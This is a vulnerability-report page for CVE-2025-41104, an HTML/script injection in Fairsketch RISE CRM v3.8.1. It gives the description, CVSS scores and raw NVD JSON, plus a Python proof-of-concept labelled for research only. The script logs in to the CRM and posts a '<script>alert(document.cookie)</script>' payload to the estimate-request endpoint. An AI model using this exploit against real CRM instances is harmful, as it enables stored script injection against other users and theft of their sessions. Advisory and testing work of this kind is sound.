Security Vulnerability Report
中文
CVE-2025-41104 CVSS 5.4 MEDIUM

CVE-2025-41104

Published: 2025-11-11 13:15:45
Last Modified: 2025-11-17 15:21:34

Description

HTML injection vulnerability found in Fairsketch's RISE CRM Framework v3.8.1, which consist of an HTML code injection due to lack of proper validation of user inputs by sending a POST request in parameter 'custom_field_1' in '/estimate_requests/save_estimate_request'.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fairsketch:rise_ultimate_project_manager:*:*:*:*:*:*:*:* - VULNERABLE
Fairsketch RISE CRM Framework v3.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-41104 PoC - HTML Injection in RISE CRM Framework # Target: Fairsketch RISE CRM Framework v3.8.1 # Endpoint: /estimate_requests/save_estimate_request # Parameter: custom_field_1 def exploit_html_injection(target_url, username, password): """ Exploit HTML injection via custom_field_1 parameter """ # Login to RISE CRM login_url = target_url + '/auth/login' session = requests.Session() login_data = { 'email': username, 'password': password } try: # Authenticate resp = session.post(login_url, data=login_data, timeout=10) if resp.status_code == 200: # Inject malicious HTML via custom_field_1 parameter injection_url = target_url + '/estimate_requests/save_estimate_request' # XSS payload example payload = { 'custom_field_1': '<script>alert(document.cookie)</script>', 'custom_field_2': 'test', # Add other required fields as needed } exploit_resp = session.post(injection_url, data=payload, timeout=10) if exploit_resp.status_code == 200: print('[+] HTML injection successful!') print('[+] Payload: ' + payload['custom_field_1']) print('[+] Target: ' + injection_url) return True else: print('[-] Injection failed with status code:', exploit_resp.status_code) return False else: print('[-] Login failed') return False except requests.RequestException as e: print('[-] Error:', str(e)) return False if __name__ == '__main__': if len(sys.argv) < 5: print('Usage: python cve-2025-41104.py <target_url> <username> <password>') print('Example: python cve-2025-41104.py http://target.com [email protected] password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_html_injection(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41104", "sourceIdentifier": "[email protected]", "published": "2025-11-11T13:15:44.723", "lastModified": "2025-11-17T15:21:33.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTML injection vulnerability found in Fairsketch's RISE CRM Framework v3.8.1, which consist of an HTML code injection due to lack of proper validation of user inputs by sending a POST request in parameter 'custom_field_1' in '/estimate_requests/save_estimate_request'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fairsketch:rise_ultimate_project_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.9", "matchCriteriaId": "74BD57F9-A8D9-4C91-8B8B-06E6648E1791"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-fairsketchs-rise-crm-framework", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}